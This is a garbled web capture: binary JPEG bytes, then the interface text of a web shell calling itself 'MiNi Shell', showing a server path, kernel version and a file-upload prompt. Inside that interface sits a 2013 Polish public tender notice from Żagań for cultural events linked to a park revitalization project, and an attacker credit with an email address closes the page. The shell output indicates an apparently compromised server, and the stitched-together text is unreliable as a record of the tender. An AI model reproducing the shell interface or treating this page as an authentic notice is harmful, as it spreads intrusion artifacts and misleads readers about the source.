JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/182378-N-2013.html

<p class="kh_header"><b>Żagań: Realizacja działań miękkich w ramach projektu  -Rewitalizacja przypałacowego zespołu parkowego w Żaganiu, jako element wspierania dostępności do dziedzictwa kulturowego</b><br>
<b>Numer ogłoszenia: 182378 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja działań miękkich w ramach projektu  -Rewitalizacja przypałacowego zespołu parkowego w Żaganiu, jako element wspierania dostępności do dziedzictwa kulturowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający udziela zamówienia w 4 częściach. Wykonawca może złożyć  po jednej ofercie  na każdą z 4 części zamówienia lub po jednej ofercie na  dowolnie  wybraną/e  część/ci przedmiotu zamówienia. 

2.1. Opis  przedmiotu zamówienia dla Części 1 :  
CPV  79.95.10.00-5   USŁUGI W ZAKRESIE ORGANIZOWANIA SEMINARIUM 

Organizacja i przeprowadzenie seminarium na temat parków i ogrodów po polskiej i niemieckiej stronie, jako część wspólnych działań sieciowych, dotyczących transgranicznej sieci współpracy Gartenkulturpfad   realizowanego przez dwa dni (100 zaproszonych uczestników, po 50 z Polski i Niemiec).  
W tym zakresie Wykonawca  jest zobowiązany : 
1. Zapewnić  jeden nocleg dla 50 osób  oraz całodzienne wyżywienie dla 100 osób. 
2. Zorganizować spotkanie polskich i niemieckich właścicieli i zarządców parków i ogrodów z Polski i Saksonii oraz pozostałych grup interesariuszy (przedsiębiorców, organizacji turystycznych, lokalnych i regionalnych organizacji pozarządowych, władz  samorządowych, szkół i in.).
3. Przygotować seminarium polsko-niemieckie, w tym:  10 odczytów na temat parków i ogrodów oraz  dwóch półtoragodzinnych paneli dyskusyjnych  nt. 1. Możliwości, szanse i zagrożenia rozwoju turystyki ogrodowo-parkowej na obszarze polsko-niemieckiego pogranicza, 2. Realizacja wspólnych polsko- niemieckich projektów.
4. Przygotować polsko-niemieckie eventy kulturalne popularyzujące Park w Żaganiu,  transgraniczną sieć parków i ogrodów oraz turystykę ogrodową (koncert muzyki poważnej, polsko - niemiecka wystawa kwiatów, konkurs na najładniejsza wiązankę).
 
W ramach realizacji części 1 przedmiotu zamówienia wykonawca  jest zobowiązany  do:
1.  Wynajmu dwóch sal niezbędnych do organizacji spotkań, seminariów i wystawy kwiatów.
2.  Wynajmu kabiny do tłumaczeń symultanicznych. 
3.  Przygotowania materiałów  na konferencję dla uczestników (teczka, notes, długopis,  identyfikator, program).
4. Ubezpieczenia uczestników w ramach polisy grupowego ubezpieczenia NNW.

Wszystkie zdarzenia w ramach realizacji części 1 przedmiotu zamówienia odbywać  się będą  na terenie zespołu pałacowo-parkowego w Żaganiu. 

Termin realizacji zadania : 27- 28 czerwca 2013 r.   
   
2.2. Opis przedmiotu zamówienia dla Części 2 : 
CPV  79.95.20.00-2 USŁUGI W ZAKRESIE ORGANIZACJI IMPREZ  79.96.00.00-1  USŁUGI FOTOFRAFICZNE I POMOCNICZE 
Organizacja i przyprowadzenie 2 - dniowych warsztatów fotograficznych pn. Park - obiektywnie (Park- obiektive), połączonych z konkursem dla uczestników w wieku od 12 roku życia  na najlepsze zdjęcie parku.
Uczestnicy warsztatów : - po 12 uczestników z Polski i Niemiec (młodzież),  podzieleni  na dwie polsko-niemieckie grupy, w każdej grupie po  dwóch opiekunów (polski i niemiecki) oraz  zawodowy fotografik asystujący i wspierający radą młodych fotografików ( w sumie grupa 32 osób, z czego 15 osób będzie korzystać z noclegu- młodzież niemiecka (12 osób) + 2 niemieckich opiekunów i 1 fotografik).   
W tym zakresie Wykonawca : 
1. Zapewni  noclegi dla 15 osób  oraz całodzienne wyżywienie dla 32 osób. 
2.  Przygotuje  spotkanie oraz wspólne omówienie doświadczeń fotograficznych wprowadzenie uczestników  w historię parku i pałacu, przygotowanie krótkiej  prelekcji w języku polskim i niemieckim.
3. Zorganizuje zwiedzanie pałacu i parku wraz z komentarzem do poszczególnych części i założeń parku, jego idei. Przedstawi najciekawsze opowieści i legendy związane  z parkiem celem przygotowania tła i podbudowy merytorycznej do  konkursu. 
4. Przygotuje i zrealizuje konkurs-  dwa dni,  w dwóch grupach,  każda z opiekunem  przez  kilka godzin- wędrówka po parku i robienie zdjęć.  W pierwszy dzień  jedna grupa (12  osób po 6 z Polski i 6 z Niemiec) na rowerach będzie docierać  do najdalszych zakątków  parku, druga  grupa wędrować będzie po parku pieszo, w następny dzień  należy dokonać  zmiany grup. Wykonawca zabezpieczy dla wszystkich uczestników konkursu nagrody. 
5. Po zakończeniu zdjęć  należy dokonać  oceny zebranego materiału- przy czym każdy  uczestnik przygotuje fotoreportaż i trzy pojedyncze zdjęcia, co będzie oceniane przez komisję, której skład ustali  Wykonawca. 
6. Przygotuje wystawę prezentującą  efekty konkursu.  Wystawa prac uczestników odbędzie się po polskiej i niemieckiej stronie. 

W ramach realizacji części 2 przedmiotu zamówienia wykonawca  jest zobowiązany do:
1. Wynajmu sali i sprzętu na okres 2 dni, zapewnienia instruktorów fotografików, zabezpieczenia materiałów eksploatacyjnych ( w tym druk prac warsztatowych, papier fotograficzny, płyty CD itp.). 
2. Przygotowania wystawy (druk wielkoformatowy  prac nagrodzonych, ramy itp.).
3. Zakupu nagród -upominków dla uczestników warsztatów.
4. Zorganizowania wycieczki-  zwiedzanie miasta (z zapewnieniem biletów wstępu i przewodnika).

Termin realizacji zadania : 08-09 czerwca 2013 r. Wystawa prac  ma zostać  zrealizowana w późniejszym czasie, nie później jednak jak do końca czerwca 2013 r. po stronie polskiej i nie później jak do końca listopada 2013 r. po stronie niemieckiej na terenie Saksonii. Sugerowane miejsce wystawy - Bad Muskau. Czas trwania wystawy minimum dwa tygodnie.      

2.3. Opis przedmiotu zamówienia dla Części 3 :  
CPV  79.95.30.00-9     USŁUGI W ZAKRESIE ORGANIZACJI FESTIWALI  
Organizacja i przeprowadzenie  na dziedzińcu pałacowym  trzydniowego festiwalu zespołów z Polski (przede wszystkim z Żagania i okolic) oraz z Saksonii (przede wszystkim z Bad Muskau i okolic). Uczestnicy festiwalu: 100 zaproszonych osób, po 50 z Polski i Niemiec, w tym 50 osób korzystających z noclegów.  
 
W zakresie tego zadania Wykonawca jest zobowiązany : 
1. Zapewnić  noclegi   dla 50 osób  oraz całodzienne wyżywienie dla 100 osób. 
2. Zorganizować trzydniowe  koncerty polskich i niemieckich zespołów muzycznych,  prezentujących dowolny rodzaj  muzyki. Dla profesjonalnej organizacji imprezy należy wynająć scenę, nagłośnienie i oświetlenie.

W trakcie festiwalu należy  zorganizować następujące imprezy towarzyszące : 
1. Warsztaty gry na gitarze dla polskich i niemieckich uczestników spotkań.  W ramach organizacji warsztatów należy wynająć dwa pomieszczenia dla uczestników warsztatów na terenie Pałacu Książęcego, zabezpieczyć i  udostępnić  instrumenty dla  osób, które nie będą dysponowały  swoimi instrumentami (10 szt.), zapewnić dwóch  instruktorów którzy poprowadzą zajęcia (2 osoby x 8 godzin),  przygotować  materiały   szkoleniowe dla 50 osób. Ponadto Wykonawca jest zobowiązany zapewnić uczestnikom   napoje chłodzące.
2. Panel dyskusyjny na temat współczesnej muzyki rozrywkowej ( zapewnienie 2 polskich  i 2 niemieckich panelistów, moderatora). Panel ma trwać 3 godziny. W ramach tego  działania Wykonawca wynajmie odpowiednie pomieszczenie w Pałacu Książęcym wraz z odpowiednim nagłośnieniem, przygotuje  (dla 50 osób) serwis kawowy i drobny  poczęstunek (słodycze i zimne napoje), przygotuje materiał poglądowy przedstawiający główne tezy panelu (prezentowane przez panelistów zaproszonych przez wykonawcę) - 50 kpl., do prowadzenia panelu dyskusyjnego Wykonawca zapewni moderatora oraz 2 dziennikarzy, zapewni wynajem pomieszczenia i nagłośnienie, serwis kawowy i drobny  poczęstunek dla uczestników. 
3. Spotkania młodzieży i osób dorosłych z Polski i Saksonii, zorganizowane wokół polsko- niemieckiego festiwalu zespołów muzycznych. Spotkania będą miały miejsce na terenie Muzeum Obozów Jenieckich, gdzie są znakomite warunki do organizacji imprez plenerowych połączonych ze  zwiedzaniem obiektów, poczęstunkiem dla uczestników- ogniskiem i  grillem Teren Muzeum jest oddalony o kilka kilometrów od zespołu pałacowo-  parkowego dlatego Wykonawca jest zobowiązany do zabezpieczenia transportu  autobusowego w obie strony.    

W ramach realizacji części 3 przedmiotu zamówienia Wykonawca  jest zobowiązany  do:
1. Wynajmu 1 pomieszczenia (techniczne zaplecze dla zespołów) na okres trzech dni.
2. Wynajmu  sceny zadaszonej o wymiarach 6m x 8 m na potrzeby organizacji festiwalu (3 dni ). 
3. Zapewnienia obsługi technicznej (akustyk, elektryk, oświetlenie, zaplecze porządkowe,  przygotowanie widowni, konferansjerka itp. na okres 3 dni). 
4. Zakupu nagród-upominków dla uczestników.  
5. Ubezpieczenia uczestników w ramach polisy grupowego ubezpieczenia NNW.

Termin realizacji zadania : 28 - 30 czerwca 2013 r. 
  
2.4. Opis przedmiotu zamówienia  dla Części 4 :
CPV 79.95.20.00-2 USŁUGI W ZAKRESIE ORGANIZACJI IMPREZ
Organizacja i przeprowadzenie Saksońsko- Żagańskiego crossu rowerowego ścieżkami Parku Książęcego. 
Uczestnicy corsu:  50 osób z Polski  i Niemiec.
Do zadań Wykonawcy należy w szczególności: 
1. Organizacja polsko-niemieckiej grupy rowerzystów, spotkanie i rozmowa z  kwalifikowanym  trenerem jazdy crossowej, którego zaangażuje Wykonawca.     
2. Wspólne wytyczenie trasy crossu alejkami parkowymi  i po bezdrożach - wytyczenie terasy  wspólnie z polskimi i niemieckimi uczestnikami (zebranie przez Komisję propozycji tras i   wybór najciekawszej z nich przez specjalistów crossu rowerowego).
3. Wyścig na czas (start co 1 minutę), kategoria open ( dla wszystkich). 
4. Uhonorowanie zwycięzców i wspólna biesiada. 

W ramach przedmiotowego  zadania Wykonawca jest zobowiązany : 
1. Zapewnić  lunch dla 50 uczestników oraz zorganizować biesiadę wieczorną na  podsumowanie crossu. 
2. Wynająć pomieszczenia na potrzeby techniczne ( szatnia, namiot cateringowy). 
3. Wyznaczyć trasę i ją oznakować. 
4. Opłacić sędziów.
5. Przygotować numery startowe, regulamin zawodów crossowych.
6. Zapewnić obsługę techniczną. przygotować materiały robocze oraz zakupić nagrody- upominki dla uczestników.    
 
Termin realizacji : 1 czerwca 2013 r.      

2.3. Dodatkowe informacje do poszczególnych części opisu  przedmiotu zamówienia:
1. Działania miękkie realizowane są  w ramach projektu Rewitalizacja przypałacowego zespołu parkowego w Żaganiu, jako element wspierania dostępności do dziedzictwa kulturowego, dofinansowanego z Funduszy Unii Europejskiej w ramach PO EWT Polska-Saksonia 2007- 2013. 
2. Koszt przewozu uczestników  ze strony niemieckiej - we wszystkich częściach przedmiotu zamówienia-  leży po stronie Wykonawcy. 
3. Koszty związane z usługami tłumaczy podczas wszystkich imprez określonych w poszczególnych częściach przedmiotu zamówienia, jak również wydruk plakatów, zaproszeń  i ulotek leżą po stronie Zamawiającego. Zamawiający zaprasza uczestników ze strony polskiej i niemieckiej.  
Wykonawca jest zobowiązany do potwierdzenia udziału uczestników na listach obecności zgodnych w załącznikiem ( załącznik obowiązuje dla wszystkich części przedmiotu zamówienia)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.95.10.00-5, 79.95.20.00-2, 79.96.00.00-1, 79.95.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawcy wniesienia wadium na poszczególne czesci przedmiotu zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej 
     działalności lub czynności, Zamawiający  nie precyzuje  żadnych warunków,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten  wymóg tego Wykonawcę,  który w okresie ostatnich  trzech lat przed upływem składania ofert , a jeżeli okres prowadzenia  działalności jest krótszy- w tym okresie,  wykonał co najmniej 1 usługę dotyczącą :  
- w zakresie Części 1 przedmiotu zamówienia:  organizacji i realizacji seminarium tematycznego dla uczestników,  o wartości nie   mniejszej jak 25 000 zł. 
-  w zakresie Części 2 przedmiotu zamówienia:  organizacji i realizacji warsztatów  fotograficznych  dla uczestników, o wartości nie  mniejszej jak 10 000 zł.    
- w zakresie Części 3 przedmiotu zamówienia : organizacji i realizacji festiwalu zespołów muzycznych, o wartości nie mniejszej jak  70.000 zł.
- w zakresie Części 4 przedmiotu zamówienia :organizacji  i realizacji crossu rowerowego,  o wartości nie mniejszej jak 10 000 zł.   
Na potwierdzenie spełnienia powyższych warunków Wykonawca złoży wraz z ofertą w zakresie danej części przedmiotu zamówienia- dokumenty określone w sekcji  III.4.1 pozycja 1 ogłoszenia. Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. Wykonawca może polegać na wiedzy i doświadczeniu innych  podmiotów, niezależnie od  charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz składając dokumenty dotyczące tego podmiotu określone w sekcji III.4.2.ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c) w zakresie dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,  Zamawiający nie  precyzuje żadnych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)  w zakresie sytuacji ekonomicznej i finansowej,   Zamawiający  nie precyzuje żadnych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykonał co najmniej 1 usługę dotyczącą :  
- w zakresie Części 1 przedmiotu zamówienia:  organizacji i realizacji seminarium tematycznego dla uczestników,  o wartości nie  mniejszej jak 25 000 zł.
-  w zakresie Części 2 przedmiotu zamówienia:  organizacji i realizacji warsztatów  fotograficznych  dla uczestników, o wartości nie  mniejszej jak 10 000 zł.     
- w zakresie Części 3 przedmiotu zamówienia : organizacji i realizacji festiwalu zespołów muzycznych, o wartości nie mniejszej jak 70.000 zł.
- w zakresie Części 4 przedmiotu zamówienia : organizacji  i realizacji crossu rowerowego,  o wartości nie mniejszej jak 10 000 zł.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta wraz z załącznikami określonymi w Specyfikacji Istotnych Warunków Zamówienia.
Oświadczenie w trybie art.44 ustawy Prawo zamówień publicznych, 
Pełnomocnictwo w zakresie określonym w SIWZ - jeżeli dotyczy Wykonawcy wspólnie ubiegającego się zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagam.pl     lub bip.zagan,pl /zakładka przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żagań Plac Słowiański 17, 68-100 Żagań , Biuro Kontroli i Zamówień Publicznych -pok. nr 26,  na pisemny wniosek wykonawcy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 11:00, miejsce: Urząd Miasta Żagań, 68-100 Żagań, Plac Słowiański 17, Biuro Kontroli i Zamówień Publicznych- pok. nr 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działania miękkie realizowane są  w ramach projektu Rewitalizacja przypałacowego zespołu parkowego w Żaganiu, jako element wspierania dostępności do dziedzictwa kulturowego, dofinansowanego z Funduszy Unii Europejskiej w ramach PO EWT Polska-Saksonia 2007- 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com